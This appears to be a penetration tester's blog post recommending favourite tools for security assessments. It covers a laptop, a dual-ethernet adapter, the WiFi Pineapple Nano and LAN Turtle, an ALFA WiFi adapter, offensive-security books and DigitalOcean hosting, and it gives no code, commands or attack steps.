One of my friends was recently asking me about some of the tools I use, particularly for security assessments. While I can’t give out all of these things for free Oprah-style, I did want to take a moment to share some of my favorite security- and technology-related tools, services and resources.

Hardware

My primary laptop is a Lenovo T450s. For me, it’s the perfect mix of weight and processing power – configured with enough RAM, the i5-5200U has no trouble running 2 or 3 VMs at the same time, and with an internal 3-cell battery plus a 6-cell battery pack, it will go all day without an outlet. (Though not necessarily under 100% CPU load.) Though Lenovo no longer sells this, having replaced it with the T460s, it’s still available on Amazon.

The USB 3.0 dual gigabit ethernet interface allows one to perform ethernet bridging or routing across it, while still having the built-in interface to connect to the internet. If you don’t have a built-in interface, it still gives you two interfaces to play with. Each interface is an ASIX AX88179 chip, and you’ll also see a VIA Labs, Inc. hub appear when you connect it, giving some idea of how the device is implemented: a USB 3.0 hub plus two USB 3.0-to-GigE PHY chips. I haven’t benchmarked the interface (maybe I will soon), but for the cases I’ve used it for – mostly a passive MITM to observe traffic on embedded devices – it’s been much more than sufficient.

The WiFi Pineapple Nano is probably best known for its Karma trickery to impersonate other wireless networks, but this dual-radio device is so much more. You can use it to connect one radio to a network and the other to share out WiFi, so you only have to pay for one connected device. In fact, you can put OpenVPN on it when doing this, so all your traffic (even on devices that don’t support a VPN, like a Kindle) is encrypted across the network. (Use WPA2 with a good passphrase on the client side if you want to have some semblance of privacy there.)
The LAN Turtle is essentially a miniature ARM computer with two network interfaces. One of those interfaces is connected to a USB-to-Ethernet adapter, resulting in the entire device looking like an oversized USB-to-Ethernet adapter. You can plug this inline to a computer via USB and have an active MITM on the network, all powered from the USB port it’s plugged into. This is a stealthy drop box for access on an assessment. (I haven’t tried, but I imagine you can power it from a wall-wart and just plug in the wired interface if all you need is a single network connection.) My biggest complaint about this device is that it, like all of the Hak5 hardware, is really not that open. I haven’t been able to build my own firmware for it, which I’d like to do, rather than just using the packages available in the default LAN Turtle firmware.

The ALFA AWUS036NH WiFi Adapter is the 802.11b/g/n version of the popular ALFA WiFi radios. It can go up to 2000 mW, but the legal limit in the USA is 1000 mW (30 dBm), and even at that power, you’re transmitting further than you can hear with most antennas. I like this package because it comes with a high-gain 7 dBi panel antenna and a suction-cup mount, allowing you to place the adapter in the optimal position. Just in case that’s not enough, you can get a 13 dBi yagi to extend both your transmit and receive range even further. Great for demonstrating that a client can’t depend on physical distance to protect their wireless network.

Books

Oh man, I could go on for a while on books… I’m going to try to focus on just the highlights.
There’s a number of books containing collections of anecdotes and stories that help to develop an attacker mindset, where you begin to think and understand as attackers do, preparing you to see things in a different light:

    Stealing the Network
    The Art of Deception
    The Art of Intrusion
    Dissecting the Hack
    Geek Mafia (and Geek Mafia: Mile Zero and Geek Mafia: Black Hat Blues)

For Assessments, Penetration Testing, and other Offensive Security practices, there’s a huge variety of resources. While books do tend to become outdated quickly in this industry, the fundamentals don’t change that often, and it’s important to understand the fundamentals before moving on to the more advanced topics of discussion. While I strongly prefer eBooks (they’re lighter, go with me everywhere, and can be searched easily), one of my coworkers swears by the printed material – take your pick and do whatever works for you.

    Red Team Field Manual: RTFM – A quick reference to commands and techniques across a variety of platforms.
    The Web Application Hacker’s Handbook – The definitive guide to web application assessment.
    Hacking: The Art of Exploitation – A great introduction to memory corruption vulnerabilities.
    Metasploit: The Penetration Tester’s Guide – The best written material I’ve seen for using Metasploit on a Penetration Test.

I’m not much of a blue teamer, so I’m hard pressed to suggest the “must have” books for that side of the house.

Services

I have to start with DigitalOcean. Not only is this blog hosted on one of their VPSs, but I do a lot of my testing and research on their VPSs. Whenever I need a quick VM, I can spin one up there for under 1 cent per hour. I’ve had nearly perfect uptime (my own stupidity outweighs their outages at least 10 to 1), and on the rare occasion I’ve needed their support, it’s been absolutely first rate. DigitalOcean started off for developers, but they offer a great production-quality product for almost any use.